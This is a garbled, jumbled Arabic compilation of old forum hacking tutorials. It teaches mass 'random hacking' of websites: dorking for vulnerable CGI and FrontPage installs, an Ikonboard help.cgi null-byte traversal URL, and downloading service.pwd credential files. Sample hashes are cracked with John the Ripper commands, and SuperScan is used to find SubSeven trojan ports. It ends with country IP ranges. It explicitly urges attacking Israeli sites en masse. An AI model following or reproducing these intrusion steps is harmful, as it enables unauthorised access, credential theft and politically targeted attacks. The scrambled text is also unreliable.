‬‬ ‫ويمكنك عمل الطريقة من ‪ DOS‬ولكن البرامج أسهل لك وأضمن لك‬ ‫======================================‬ ‫وألحين أكيد تبون تجربون على موقع أقولكم روحوا ‪google‬‬ ‫‪/http://www..com‬‬ ‫واكتبوا في إطار البحث‬ ‫‪/_vti_pvt‬‬ ‫وراح تطلعلك مواقع كثيرة تحتوي على هذه الثغرة‬ ‫وعندك محرك بحث‬ ‫‪/http://www.‬‬ ‫انتهى‪،،،‬‬ ‫‪171‬‬ .‬‬ ‫‪link:adminstrators‬‬ ‫وغيرها من الملفات الحتمال وجود ‪ password‬فيها‪..altavista.google.pwd‬‬ ‫أو‪.‫والمزيد ‪..com‬‬ ‫تكتب في محرك البحث‬ ‫‪link:service.

sites‬عشان تحصل على كل هذه السايت روح الموقع هذا‬ ‫‪http://iguide.co.il‬‬ ‫‪/http://www.il‬وهذه مهمه ‪ ،‬و‬ ‫‪ .sites 78‬تنتهي بـ ‪ gov..com‬وأكتب ‪) ، link:xxxx.achla.‬‬ ‫ويوجد برنامج تقدمه سيكيورتي فوكسي بإسم سيكيورتي فوكس بيجر ‪ ،‬هو برنامج لتسهيل عمليه الحصول‬ ‫على الخبار ووو‪.7‬وهذا ليس لب موضوعي ولكن هي بدايه ومثال ل تحفظه لني أحضرت أبسط مثال فقط فيوجد غيره‬ ‫مئات بل آلف ملفات الـ ‪ CGIScript‬تملك ثغرات مثل هذه واغلب إستثماراتها تكون من خلل ‪url‬‬ ‫للحصول على مثل هذه الستثمارات لثغرات ملفات السي جي آي سكريبت شوف الرشيف هذا وهو لغته‬ ‫روسيه أعتقد ولكن ما يهم لننا نبحث عن الـ ‪ Exploit‬أو الستثمار‬ ‫‪/http://www.cgi‬لتعرف اين مكانه ‪ ،‬لنفرض مكانه هنا ‪http://www.co.il‬و ‪ sites 70‬تنتهي بـ ‪ ac..htm‬‬ ‫وفيه كمان محركات بحث‬ ‫‪/http://www.cgi‬المواقع المردوده لك نتيجه للبحث كلها تملك‬ ‫منتدى ‪ ، Ikonboard‬إفتح واحد منها وأبحث في المصدر الكود ‪ HTML‬عن السكربت الذي بحثت عنه‬ ‫‪ help.il/sites/sites.org .co.il‬و ‪ sites 2009‬تنتهي بـ ‪ ، com‬و‬ ‫‪ .‫" الختراق العشوائي "‬ ‫>ةةةةة<‬ ‫>ةةةةةة‪ :‬ةةةةةةة<‬ ‫ ماهو الـإختراق العشوائي ‪Random Hacking‬‬‫ تطويره بحيث يصبح يبحث على إستثمارات غير الـ ‪CGIScripts‬‬‫ كيف تستغل اي ثغره بعد الحصول عليها‬‫ ماهو الـإختراق العشوائي ‪Random Hacking‬‬‫هو البحث في كميه كبيره من المواقع عن ثغره محدده ‪ ،‬وهذا سهل ويعود بمواقع كثيره جدا جاهزه للختراق‬ ‫‪ ،‬مثال بسيط جدا ‪ ،‬روح على محرك بحث ‪ ،‬من محركات البحث التي تعتمد على الـ ‪ spiders‬أو العناكب‬ ‫مثل ‪ altavista.net .co.secure.4 sites‬لعينه ‪israel.com‬وتشوف‬ ‫النتائج ‪ ،‬أو تشترك في القائمه البريده لـ سيكيورتي فوكس فهي مفيده جدا أنا شاركت من قبل فتره وجدا‬ ‫أعجبت بها وهي مختصه في المن وليس لـثغرات السي جي آي سكربت ‪ ،‬يعني امن واخبار وكل شئ ‪.example.il‬‬ ‫‪/http://www.‬الخ‬ ‫ تطويره بحيث يصبح يبحث على إستثمارات غير الـ ‪CGIScripts‬‬‫الختراق العشوائي إذا كان فعل عشوائي ‪ ،‬يعني تخترق اي موقع ولو بدون سبب فهذه همجيه !! ‪ ،‬لكن‬ ‫ممكن نستفيد منه إحنا في أنه ما يكون في شكل همجي ‪ ،‬أنا اقول لك كيف ‪ ،‬مثل إسرائيل اللي الكل يكرهها ‪،‬‬ ‫الذين يأمرون الفلسطينيين بأوقاف إطلق النار ‪ ، (:‬الكل يكرههم ليس لجل أنهم يهود ‪ ،‬ل نكرههم لنهم‬ ‫ظلموا فلسطين ‪ ،‬عندهم موقع فيه آلف من مواقعهم هذا هو ‪ sites 12610‬تنتهي بـ ‪ co.maven.1.sites 29‬تنتهي بـ ‪ muni.f2s.com/cgi-‬‬ ‫‪bin/help.sites 137‬تنتهي بـ ‪ net‬و ‪ .121 sites‬و ‪ ...il‬و ‪ ./members/[member].il .cgi ، link:help.sites‬و ‪.cgi‬‬ ‫أكتب بعد الملف غير العنوان ليصبح ?‪http://www...84 ،‬‬ ‫‪ .edu .sites 54‬تنتهي بـ ‪ net.tapuz..co.reshet.il‬و ‪1104‬‬ ‫‪ sites‬تنتهي بـ ‪ org.vs?dw=1‬‬ ‫‪/http://www.securiteam...com/eng_ver/bugs‬‬ ‫وممكن تأخذ إسم المنتج مثل وتضعه في محرك البحث لـ ‪ /http://www.cgi or pl‬إرجع لشرح زورو في رياضيات البحث( مثل‬ ‫نبحث عن لنك لملف بإسم ‪ help.cgi‬‬ ‫‪helpon=..cgi%00‬‬ ‫مع ملحظه تغيير ]‪ [member‬بإسم عضو وبدون القوسين ][ طبعا‬ ‫سوف يعرض لك معلومات العضو كامله ومن ظمنها كلمة المرور وهذه الثغره لـ المنتدى ‪Ikonboard‬‬ ‫‪ 2..il/data/index..walla.example.il‬و ‪ .il‬‬ ‫‪http://www..com/cgi-bin/help.il‬‬ ‫‪172‬‬ .co. .

.‬‬ ‫وافتحه وتجد كل المواقع ‪ ،‬اللي كتب عنها ‪ The page cannot be displayed...pl > log.. image/jpeg.0 (compatible.‫‪http://www. image/pjpeg‬‬ ‫‪Accept-Language: ar-sa‬‬ ‫‪(User-Agent: Mozilla/4.il/cgi-bin‬يتضح طلبنا لـ ‪cgi-‬‬ ‫‪ ، /bin/w3-msql‬في الحقيقه ل نبحث عن ثغرات سي جي آي ‪ ،‬ولكن نبحث عن كل المواقع التي يوجد‬ ‫بها المنتج ‪ ، WWWMSQL‬يعني المواقع السرائليه مثل التي جمعناها في ملف تكست كلها تأخذ واحد‬ ‫واحد وتدخل في البرنامج الذي صممناه وترسل الى البروكسي بحثا عن ‪ cgi-bin/w3-msql‬وثم يحفظ‬ ‫رد البروكسي في ملف خارجي ‪ ،‬وهكذا حتى ننتهي من كل المواقع ‪ ،‬وثم نفتح الملف ونشوف التي تم إيجاد‬ ‫المنتج ‪ WWWMSQL‬داخها والتي لم يوجد ‪ ،‬ونتوجه الى سيكيورتي فوكس وال سيكيورتي تيم وال أي‬ ‫موقع يعجبك وابحث عن ‪ ، w3-msql‬مثل في سيكوتي تيم نجد ‪ Exploit‬لـ ‪ w3-msql‬يمكن تطبيقه‬ ‫من المتصفح ‪ ،‬وهو هنا ‪http://www.il‬‬ ‫المهم على كل شخص منا أن يصلح فرز للبيانات الموجوده في هذه المواقع ‪ ،‬يستخدم اللغه التي يتقنها‬ ‫ليصنع برنامج يصلح فرز ويضعها في ملف تكست بدون اشياء ثانيه معها‬ ‫العمليه الثانيه هي البحث فيها كلها عن منتج ‪ ،‬مثل ‪ ، /w3-msql‬الطريقه سهله جدا ‪ ،‬أول يتم الشبك مع‬ ‫بروكسي مثل ‪ proxy. image/x-xbitmap.‬الخ بهذه الطريقه تعرف اللي موجود عليه واللي مو موجود ‪... not found.html‬‬ ‫طريقه فحص عده مواقع بحثا عن منتج فيها أسميها انا ‪ Random Hacking‬يعني إختراق عشوائي ‪،‬‬ ‫ولكن لو فعل بحثت عن ‪ w3-msql‬في المواقع السرائليه فأنا أقول لك بأنك ما راح تلقى كثير أو لن تجد‬ ‫شئ ‪ ،‬ممكن تبحث عن ‪ /vti_pvt_/‬لترصد كل المواقع التي فيها فرونت بيج ‪ ،‬وطبعا بعد ما يتم حفظ كل‬ ‫المعلومات المسترجعه من البروكسي تكون بشكل ‪ HTML‬عشان كذا أنت خل الملف يكون بنسق *‪html.com/exploits/2WUQBRFS3A. MSIE 5.info.com.com.sa :8080‬وثم يرسل له أمر ‪ ، GET‬مثل ترسل للبروكسي‬ ‫‪GET http://www.com.htm‬‬ ‫وبالنسبه للمنتج أكتيف بيرل فقط تواجه فيه مشاكل ‪ ،‬لن بعض الـ ‪ Exploit‬كتب في الصدار أربعه وممكن‬ ‫خمسه وممكن ما يعمل زين في أكتايف بيرل لذلك قد تضطر لتغير المفسر عندك أو تعدل في الكود وهذا كله‬ ‫يطلب خبره في اللغه ‪ ،‬وعلى فكره ليونكس )أعمل على ‪( RedHat 6.co.‬والباقي عليك‬ ‫ كيف تستغل اي ثغره بعد الحصول عليها‬‫إذا كانت ‪ url‬ما يبغا لها فلسفه ‪ ،‬كود ‪ c‬وما عرفت تشغله أو قابلت فيه أخطاء فممكن تبحث عن فرجون‬ ‫ثاني لـه ولكن بلغه ‪ perl‬أو ‪ Shell *.il/cgi-bin/w3-msql/ HTTP/1.... Windows 98‬‬ ‫‪Host: www.net.‬الخ ‪ ،‬من هذه الردود تعرف اللي نت فاوند وال موجود ولكن‬ ‫غير مسموح بالوصول له ‪.il‬‬ ‫‪Proxy-Connection: Keep-Alive‬‬ ‫وهو يطلب من البروكسي أحضار الموقع ‪ ، /http://www..gov.isp.0‬‬ ‫‪*/* .pl‬إذا كان الـ ‪ exploit‬بلغه‬ ‫بيرل ولكن طبعا فيه أشياء تغييرها في الكود نفسه ‪ ،‬وهذه الشياء تكون مكتوبه بين علمات التعليقات ‪(:‬‬ ‫وأكيد بتواجه مشاكل إذا ما تعرف شئ في بيرل ‪ ،‬في هذه الناحيه ل تطلب شرح بالصور ‪ (:‬إذا رجع لك رد‬ ‫طويل ما قدرت تقراه ممكن تحفظ الخرج عن طريق علمة > وثم مسافه وإسم الملف مثل ‪perl‬‬ ‫‪exploit.‬‬ ‫انتهى‪،،،‬‬ ‫‪173‬‬ ..securiteam.Accept: image/gif.pl‬‬ ‫وفيه محرك أعدم منها واللي هو ‪altavista.2‬فيه مفسر بيرل ممتاز جدا افضل‬ ‫من أكتيف بيرل بعشرات المرات‪.il/find..sh‬وهو الذي يقابل ‪ Batch‬في ويندوز وتحدثنا عنها في كوكب‬ ‫لغات البرمجه ‪ ،‬من الدوس بعد ما تثبت أكتيف بيرل أكتب ‪ perl exploit.5.‬واللي‬ ‫‪ Forbddien‬واللي ‪.

net‬‬ ‫ادخله‬ ‫تلقي مربع‬ ‫هنا تحط فيه الموقع اللي تبي تعرف المعلومات اللي فوق‬ ‫مثل نحط موقع البيت البيض اللي هو ‪whitehouse..whitehouse..com/up/graph.netcraft.org‬‬ ‫ملحظة‪ :‬نكتبه من غير ‪ //:http‬ول ‪ /‬اللي بالخير‬ ‫‪http://uptime.0 on Windows‬‬ ‫‪2000‬‬ ‫طيب‬ ‫الحين عرفنا معلومتين مهمتين‬ ‫اول شيء انه شغال على الملقم ‪IIS5.‬‬ ‫طيب‬ ‫الحين عندنا موقع‬ ‫وشلون نعرف نظام التشغيل والملقم والخدمات والمعلومات كلها‬ ‫عندك الموقع ‪http://www.0‬‬ ‫ثاني شيء شغال على نظام ويندوز ‪2000‬‬ ‫حلو‬ ‫‪174‬‬ .netcraft.‬‬ ‫الملقمات اشهرها اثنين‬ ‫‪ :IIS‬من مايكروسوفت وهذه مليانة ثغرات‪) ..org‬‬ ‫راح يطلع لنا التالي‬ ‫‪The site www.whitehouse.‫" الطريقة الصحيحة والمثلى في اختراق المواقع "‬ ‫>ةةةةة<‬ ‫>ةةةةةة‪< marwan911 :‬‬ ‫اول خطوة في الختراق واللي هي اخذ المعلومات‬ ‫يعني نعرف الموقع الفلني شنهو الملقم اللي شغال عليه والنظام والخدمات اللي يدعمها‪.org is running Microsoft-IIS/5.‬ومواقع قليل مقفلة ثغراتها(‬ ‫‪ :apache‬من مجموعة مبرمجين متوزعين في انحاء العالم واختراقها شبه صعب‪.

com‬‬ ‫لو حللناه بالنيت كرافت راح نشوف النتيجة التالية‬ ‫)‪The site www.3 FrontPage/5.com is running Apache/1.26 mod_bwlimited/0.2510‬وهذه مليانة ثغرات‬ ‫والثالث النظام وهو ‪Linux‬‬ ‫طيب‬ ‫الملقم‬ ‫اول شيء اباتشي من الملقمات الصعبة الختراق إل بعض الصدارات منها فنحط هذه على جنب‪.20 (Unix‬‬ ‫‪mod_gzip/1.8.6‬‬ ‫‪on Linux‬‬ ‫طيب هنا يهمنا ثلث اشياء‬ ‫الملقم وهو ‪ apache 1.3.4 OpenSSL/0.3.‬راح احط امثلة‬ ‫عليها‪.‬‬ ‫نشوف دعم الفرونت بيج‬ ‫زي ماقلنا الفرونت بيج مليان ثغرات‬ ‫وثغراته قوية وكثيرة تقريبا‬ ‫منها مجلد _‪ vti_pvt‬و _‪ private‬هذه اللي نحتاجها غيره مامنه فايدة‬ ‫‪175‬‬ .2.2.0.6‬‬ ‫‪mod_log_bytes/0.8 PHP/4.19.0.3.‫اول شيء نجرب ثغرات ‪ IIS5.0.‬‬ ‫طيب لنفرض انه ماطلع فيها ثغرات؟‬ ‫نشوف محتويات الموقع نفسه‬ ‫نشوف إن كان عنده سجل زوار او منتدى او او او ونطلع ثغراتها من الموقع اللي راح ارفقه في الرد اللي‬ ‫بعد الموضوع‪.0‬عليه )راح احطها بعد الموضوع(‬ ‫إذا مانفع شيء نشوف ثغرات نظام ويندوز ‪) 2000‬راح احط الموقع بعد الموضوع(‬ ‫طيب‬ ‫الحين فيه حاجة اسمها يوني كود‬ ‫هذه تخترق فيها عن طريق المتصفح‬ ‫وماتمشي إل مع ملقمات ‪ IIS‬وهي عبارة عن عناوين طويلة تحطها بعد عنوان الموقع‪ .9.1a mod_perl/1.‬‬ ‫طيب لو كان السيرفر اباتشي؟‬ ‫خلونا ناخذ مثال موقع ارانك ‪www.arank.2510 mod_ssl/2.arank.20‬و دعم فرونت بيج ‪ FrontPage/5.

ussrback.sa/_vti_pvt/service.pwd‬‬ ‫و ‪ adminstators.‫داخل المجلدين راح نلقي اربع ملفات مهمة وهي ‪ service.box.goody.‬‬ ‫انتهى‪،،،‬‬ ‫‪176‬‬ .com‬الموقع هذا خطير جدًا جداً تروح ل ‪ EXPLOITS‬اللي عاليسار‬ ‫وتختار اول اختيار هنا ثغرات جميع النظمة من لينكس و ويندوز و و و الخ‪ .sk‬هذا الموقع مفيد جدا تكتب مثل )فوق بالمربع اللي عاليمين( ‪ IIS‬او‬ ‫‪ apache‬او منتدى واصدارته او اي برنامج ويطلع لك ثغراته‬ ‫‪ /http://www.pwd‬‬ ‫طيب الحين ‪ goodyco‬اليوزر والباسس مشفر واللي هو ‪CalXS8USl4TGM‬‬ ‫وشلون ينفك؟ ينفك ببرنامج اسمه ‪john the repaier‬‬ ‫تنزله وتحط الملف المشفر )مع اليوزر( بمجلد واحد وتفتح الدوس وتروح لمجلد جوهن وتكتب السطر التالي‬ ‫‪john -i PASSWORD.‬ومنوعة من ‪ c‬و ‪ perl‬و‬ ‫يوني كود‪.com.FILE‬‬ ‫وعاد استناه يطلع لك الباسس‬ ‫طيب نروح للفقرة الثالثة واللي هي النظام‬ ‫زي ماشفنا النظام هو لينكس‬ ‫لكن لينكس ايش؟ فيه ريد هات و ماندريك وفيه منه إصدارت كثير وثغرات اكثر‬ ‫لكن هنا راح تواجهك مشكلتين‬ ‫اول شيء معرفة النظام تقدر تطلعه من ابدا وتشغيل ول ‪ telnet‬واكتب عنوان الموقع يطلع لك النظام فوق‬ ‫نوعه وإصدارته‬ ‫المشكلة الثانية لزم يكون عندك لينكس اصل‬ ‫علشان ثغراته بلغة ال ‪ c‬وهذه ماتشتغل إل عاللينكس فقط‬ ‫================‬ ‫‪ /http://neworder..pwd‬و ‪ users.pwd‬ويعتبر هذا اخطر ملف‬ ‫طيب لو قدرنا ننزل واحد من الملفات هذه )ملحظة الثغرة هذه موجودة ب ‪ %70‬من المواقع الموجودة‬ ‫عالنت( لو نزلناها نفتحها بالمفكرة ونلقي السطر هذا على سبيل المثال‬ ‫‪goodyco:CalXS8USl4TGM‬‬ ‫وهذا من موقع قودي ‪http://www.pwd‬و ‪authors.

‬عليك بأتجاه للموقع المراد اختراقه‬ ‫حيث يجب عليك دراسة الموقع كامل من حيث عدة عوامل اهمها‬ ‫‪ ( -1‬نظام السيرفر والمستخدم في الموقع وينقسم السيرفر الى نوعين‬ ‫ا ( ‪ -‬النوع الول هو ‪ ) IIS‬اي اي اس (‬ ‫ب ( ‪ -‬النوع الثاني ‪ ) apachc‬اباشي (‬ ‫‪ ( -2‬ملحظة وجود محرك بحث في الموقع ام ل‬ ‫‪ ( -3‬معرفة وقت الذروه لزوار الموقع ووقت الخمول‬ ‫‪ ( -4‬معرفة اليبي للموقع‬ ‫تقريبا هذه اهم العوامل المتخذه كعوامل مطلوبه جدا لتنفيذ العمليه وهذه تاخذ‬ ‫وقت حيث ان كل شي مايجي بالساهل‬ ‫سبق وذكرنا السيرفر ‪ IIS‬والداعم لبعض المواقع وهذا امره تقريبا سهل حيث ان‬ ‫اغلب من يستعمل هذه الطريقه هم من الهواه‬ ‫حيث ان ثغرات تقريبا سهله واختراقها ايضا مرتبط بأن تكون الثغرات التي لديك‬ ‫جديده و طااازه‬ ‫وشوية صبر بالستعانه بال ثم ببعض البرامج المساعده وسوف تححق نجاحاتك‬ ‫بأذن ال ‪.‬‬ ‫سيرفر ‪ apachc‬وهذا السيرفر قوي جدا وغالبا ل يعمل على البحث عن ثغراته‬ ‫سوى المحترفون ‪ .‬‬ ‫انتهى‪،،،‬‬ ‫‪177‬‬ .‬لنه يتطلب عدة امور ل يستطيع عملها ال من له خبره‬ ‫بنظام ليونكس ويعرف بعض لغات البرمجه ‪.‫" نبذه يسيرة ومبسطة عن كيفية اختراق المواقع "‬ ‫>ةةةةة ةة ةةةةةةة ةةةة ةة<‬ ‫>ةةةةةة‪:‬‬ ‫ركز معي‬ ‫هذا سؤال يحير الجميع بالذات المبتدئين ‪ .

‬أنا تطوت كثير ‪(:‬‬ ‫ج*‪ :‬أوكى تفضل ‪(:‬‬ ‫س ‪ :2‬لقد سمعت كثيرا عن ثغرات الفرونت بيج ‪ .com :‬وقم بموضعه في شريط العنوان ‪ . Ripper‬نزله من هنا‪http://www.‬أنا كنت عايز أسألك شوية أسألة في الهاكنج‪.pwd‬‬ ‫‪Users.pwd‬‬ ‫التي بتكون عادة في المجلد _‪vti_pvt‬‬ ‫مثل هذه الملف مثل‪(: http://www.‬ولكن كيف أدخل على الموقع كأدمين بهذه الكلمات ؟؟ ‪S:‬‬ ‫ج‪ :‬يمكنك استخدام برنامج اف تي بي مثل برنامج ‪ .‬هيكون فيه‬ ‫مجلدين‪ .openwall. FrontPage‬وبتمكنك من معرفة كلمة سر الدمين تبع الموقع ‪(:‬‬ ‫وكلمات السر هذه بتكون موجودة في الملفات التالية‪:‬‬ ‫‪Administrator.pwd‬‬ ‫‪Administrators. run‬شوف‪ :‬عشان تسهل على نفسك وبدل ماتفتح الدوس‬ ‫وتدخل على مجلد البرنامج وهالمشاكل وكمان البعض ما بيعرف يعمل هالشياء ‪: p:‬‬ ‫ابحث في جهازك عن‪ command. run‬أوكى ؟؟‬ ‫‪178‬‬ .ebnmasr.‬هل يمكنك توضيح طريقة استخدام هذه الثغرة ‪.‫" )>س&ج<( في اختراق المواقع للمبتدئين "‬ ‫>ةةةةة ةة ةةةةة ةةة ةةة<‬ ‫>ةةةةةة‪ :‬ةةةةةة ةةةةةة<‬ ‫س*‪ :‬السلم عليكم أخي القناص العربي‪(:‬‬ ‫ج*‪ :‬أهلين القناص العربي المزيف ‪D:‬‬ ‫س*‪ :‬أحم أحم ‪ .#‬‬ ‫‪tradesys:FpNTpIDWSk872‬‬ ‫وهذه كلمة السر المشفرة واسم المستخدم ‪(:‬‬ ‫س ‪ :3‬أووووه واااااو ممتاز ‪ .‬‬ ‫ج ‪ :2‬بالتأكيد حبي ومن عيوني الثنين ‪D:‬‬ ‫طبعا ثغرات الفرونت بيج بتكون موجودة في أنظمة التشغيل ‪ NT & Unix‬التي يدعم سيرفراتها الـ‬ ‫‪ .pwd‬‬ ‫‪Authors.com :‬وقم بنسخه والصقه في مجلد ‪ .pwd‬هتلقي مكتوب بداخله هكذا تقريبا‪:‬‬ ‫‪-FrontPage.tradesystemlab.‬‬ ‫ج*‪ :‬تفضل حبيبي ‪ .‬وسيطلب منك الموقع اسم‬ ‫المستخدم وكلمة المرور للموقع ‪(:‬‬ ‫س ‪ :4‬مشكور حبيبي ولكن ليش مايدخل باسم المستخدم وكلمة السر هذه ‪:‬‬ ‫‪ tradesys:FpNTpIDWSk872‬؟؟ )‪(N‬‬ ‫ج ‪ :4‬بكل بساطه لنها مشفرة !! ‪ .‬أنا في الخدمة ‪ . WS_FTP‬أو ضع بدل ‪ www‬في عنوان الموقع كلمة‬ ‫‪ ftp‬مثل هذا‪ ftp.‬يمكنك فك تشفيرها عن طريق برنامج مثل برنامج ‪John The‬‬ ‫‪ .‬لكني ماأعرف أستخدم هذا البرنامج ‪ .com/john :‬‬ ‫س ‪ :5‬أها ‪ .com/_vti_pvt/service. doc & run :‬الي يهمنا هو مجلد ‪ .‬بس ياريت ماتكون عن اختراق الجهزة ‪ .pwd :‬‬ ‫وبعد فتح الملف ‪ service. (:‬شوف‪ :‬انت أول ماتنزل البرنامج وتفك ضغطه ‪ .‬ولعب العيال هذا !!‬ ‫س*‪ :‬ل ل ‪ .‬ممكن تشرحهولي أخي العزيز القناص لو سمحت ؟؟‬ ‫ج ‪ :5‬لتستأذن مني ياولد !! ‪ .

pot :‬‬ ‫س ‪ :6‬يااااااه ‪ .‬متأكد أنه هيفك تشفيرها ؟؟‬ ‫ج ‪ :6‬أيوووووه لزم يفك تشفيرها في النهاية ‪ .‬هذه‪(: (: (: service. $:‬يعني انت مثل عايز تبحث عن‬ ‫الثغرة التي تم ذكرها سابقا ‪ .‬خلص انفكت كلمة السر )‪ . (Y‬لكن وين اسم المستخدم ؟؟‬ ‫ج ‪ :7‬في كلمة السر هذه‪ .( ‪ . EXPLOITES‬هذا‬ ‫هو‪.txt‬ليبحث لك عن الرقام فقط‬ ‫‪ << john -i:Alpha passwd. EXPLOITES‬وبتبدأ تجرب ثغرة‬ ‫ثغرة على الموقع ‪ .( ‪. /http://www.‬لكن لن أقولك لك على أي واحدة‬ ‫منها ‪ .txt‬ليبحث لك عن جميع الحتمالت ‪ ) .‬مشكور حبيبي ‪ .‬هتكتب ايه ؟؟ ‪ .‬‬ ‫وممكن تعرف حالة البرنامج بالضغط على أي زر من لوحة المفاتيح ‪(:‬‬ ‫س ‪ :7‬الحمد ل ‪ .txt‬ليبحث لك عن الحروف الصغيرة‬ ‫‪ << john -i:all passwd.‬ممكن تقولي كيف جبت هالثغرة من الموقع ؟؟ ‪$:‬‬ ‫ج ‪ :8‬هههههههههه ‪ .‬حتى لو أخذ أسبوع .‬وأنا على طول أستخدم هذا المر ‪.‬كنت عايز أسألك كمان عن كيفية عمل برامج السكان على الثغرات ‪(:‬‬ ‫ج ‪ :11‬البرامج هذه بتكون فيها مجموعة كبيرة من الثغرات أو الـ ‪ .com :‬‬ ‫انتهى‪،،،‬‬ ‫‪179‬‬ . run‬ول تقم بفتح ‪ .‬‬ ‫عشان كده بتطول عملية الفك معي ‪( D:‬‬ ‫وبعدما ينتهي البرنامج من فك الكلمة ستجد كلمة السر المشفرة والمفكوكه بالملف هذا‪john.txt‬ليبحث لك عن الكلمات السرية التي تكون مطابقه لسم المستخدم‬ ‫‪ << john -i:Digits passwd.‬وليه هالوجه الخجلن . john.‬وتطلعلك النتائج ‪ .( ‪ .‬البرنامج طول كثير ‪ ..‬مانت كاتب غير كلمة واحدة ‪ .‬في طبعا مواقع كثيرة بتستخدم السبايدرز ‪ .co.‬مافهمتك زين !!‬ ‫ج ‪ :10‬أنا وال ماأستخدم هالمواقع ال للبحث عن ثغرات الفرونت بيج ‪ .‬ولكن انت لو كان‬ ‫عنك موقع ممكن تعمل عليه سكان ببرنامج فحص مثل برنامج عمران ) المفضل لدي ‪ ( D:‬عشان تطلع‬ ‫الثغرات الموجودة بالموقع ‪(:‬‬ ‫س ‪ :9‬طيب أنا عندي سؤالين عالجواب الي فات ده ‪ . (:‬وفي موقع رهيييب عشان تجيب منه الـ ‪ . tradesys:FpNTpIDWSk872 :‬هيكون اسم المستخدم‪tradesys :‬‬ ‫) يعني الكلمة الي بتكون قبل علمة ‪( :‬‬ ‫س ‪ :8‬قنااااااص ‪ .‬هذه الطريقة ‪ :‬انك تبحث عن ثغرة معينة في محرك بحث يستخدم الـ ‪ spiders‬عشان تلقي‬ ‫مواقع كثيييرة فيها الثغرة هذه ‪ .‬ال هذا الموقع‪ walla.‬عشان معظم النتائج تكون مواقع‬ ‫اسرائيلية .‬‬ ‫س ‪ :10‬ممممم ‪ .exe‬افتح ‪ command. (:‬ايه طريقة البحث العشوائي هذه‬ ‫؟؟‬ ‫ج‪ :‬أحم أحم ‪ .‬لنه بيجرب جميع الحتمالت‪.il :‬وطبعا هذا موقع اسرائيلي ‪ .pwd :‬‬ ‫س ‪ :11‬أهاااااا ‪ .com‬واكتب فيه الوامر التالية‪:‬‬ ‫‪ << john -single passwd.‬هأسأل واحد الول ‪ ..‬أنا بصراحة جبتها بالبحث العشوائي ‪ .‬كيف يعني تبحث عن ثغرة معينه ؟؟ ‪ .ussrback.‫وجيب كلمة السر هذه‪ tradesys:FpNTpIDWSk872 :‬وحطها في ملف ‪ txt‬باسم ‪ passwd‬مثل‬ ‫وضعه في مجلد ‪ .

‬‬ ‫‪http://mypage.‬‬ ‫رقم ‪ 2‬أظهار الكودات المستخدمة‪.‬‬ ‫رقم ‪ 3‬بدأ البحث‪.zip‬‬ ‫انتهى‪،،،‬‬ ‫‪180‬‬ .‬‬ ‫رقم ‪ 4‬تضع العنوان للضحية‪..com/vox99/cgiscan3.‬‬ ‫وأترك البرنامج وسوف يظهر لك الثغرات الموجودة فى الموقع‪.‫" برنامج ‪ CgiScaner‬للبحث عن الثغرات "‬ ‫>ةةةةة<‬ ‫>ةةةةةة‪ :‬ةة ةةةة<‬ ‫هنا برنامج رائع للبحث عن الثغرات‬ ‫رقم ‪ 1‬خروج‪.‬‬ ‫وصلة البرنامج‪.ayna.

‬رغم ان‬ ‫البرنامج وقوة اتصاله ممتازه ال ان الباحث ضعيف فنستخدم هذا البرنامج كاداة‬ ‫مساعده ’’’’’ ول اطيل عليكم بالكلم اليكم الشرح‬ ‫انا شرحت البرنامج رغم سهولته وفوق ذلك معرب‬ ‫ولكن البعض ليعرف استخدامه ‪ .‬اليكم واجهة البرنامج‬ ‫‪181‬‬ .‬لن بعض البرامج يكون فيها الباحث ضعيف ول يصيد‬ ‫اي اي بي به منفذ مفتوح ومن امثلة ذلك برنامج السب سفن جولد ‪ ..‫" شرح برنامج سوبر سكان لمعرفة المنافذ المفتوحة في‬ ‫المواقع "‬ ‫>ةةةةة ةة ةةةةةةة ةةةة ةة<‬ ‫>ةةةةةة‪ :‬ةةةةةة<‬ ‫تعريف بالبرنامج ‪ :::‬هذا البرنامج يقوم بالبحث عن المنافذ المفتوحه في جهاز‬ ‫الضحيه ‪ .....

‬‬ ‫بعد ذلك نرجع للصوره الولى ونضبط الخيارات كما هو موضح‬ ‫ونحدد الي بي من ‪ ------------‬الى‬ ‫بعد ذلك نضغط ابــــــــــــدأ فتظهر لنا الي بيات والي بي الذي به منفذ مفتوح‬ ‫نحصل علمة ‪ +‬على يساره عندما نضغط عليه يظهر لنا المنفذ المفتوح‬ ‫كما في الصوره الولى ‪...‬‬ ‫‪182‬‬ .....‫ثلث خطوات تقوم بها وهي كالتالي ‪::‬‬ ‫انظر اعلى اليمين تجد قائمة المنافذ ادخل قائمة المنافذ لتحديد المنفذ‬ ‫ل السب سفن المنفذ الخاص به ‪ 27374‬او ‪.‬انتهى و‪. 1243‬‬ ‫المراد البحث فيه مث ً‬ ‫انظر الصوره التاليه ؟‬ ‫في رقم واحد نكتب المنفذ الذي نريد البحث فيه‬ ‫رقم اثنين لكي نضيف المنفذ **ملحظه نقدر نضيف اكثر من منفذ‬ ‫بعد ماننتهي من اضافة المنفذ نضغط اوكي للتأكيد ونتأكد من ان المنفذ قد‬ ‫اضفناه كما في الصوره ‪.....

133.255<-------------212.50.1.255<------------194.29.255<-----------195.255--------------193.255<-------------209.1‬أسرائيل‬ ‫‪<--------212.1‬المارات‬ ‫‪<-----------213.255--------------192.102.139.255.49.31.187.128.255---------------199..133.72.1‬الكويت‬ ‫‪<-----------195.255----------------216.255---------------209.0.255.1‬المارات‬ ‫‪ <----------195.‫وصلة البرنامج‪.88.40.255----------------213.1.255<--------------208.255<-------------195.29.116.‬‬ ‫‪http://mypage.72.1‬أسرائيل‬ ‫‪<--------192.42.1‬أسرائيل‬ ‫‪<-------192.1.204.1.120.25<-------------194.109.116.102.1‬الكويت‬ ‫‪<----------168.1‬السعوديه‬ ‫‪ <------------212.150.72.72.7.224.130.255<--------------212.255<-------------212.1‬أسرائيل‬ ‫‪<--------139.102.255<-------------213.1‬أسرائيل‬ ‫‪<--------209.1‬السعوديه‬ ‫‪ <-----------213.43.2.208.1‬أسرائيل‬ ‫‪<---------216.198.238.225<--------------212.102.128.255.255<-----------195.229.42.227.70.255<------------195.1‬قطر‬ ‫‪ <-----------206.190.26.106.255--------------212.255<--------------213.92.143.255---------------139.1‬عمان‬ ‫‪ <-------------212.1‬أسرائيل‬ ‫‪<---------213.255---------------212.1‬أسرائيل‬ ‫‪<-------212.109.170.255---------------192.238.255---------------212.42.238.92.117.226.224.49.236.1‬الكويت‬ ‫‪<----------195.39.60.150.43.255<------------212.229.1.88.30.255<-----------212.113.208.255<------------193.75.20.240.1‬قطر‬ ‫‪ <------------209.13.236.72.1‬السعوديه‬ ‫‪ <-----------212.0.1‬السعوديه‬ ‫‪ <-----------212.117.com/a7lla1/superscan.133.1‬المارات‬ 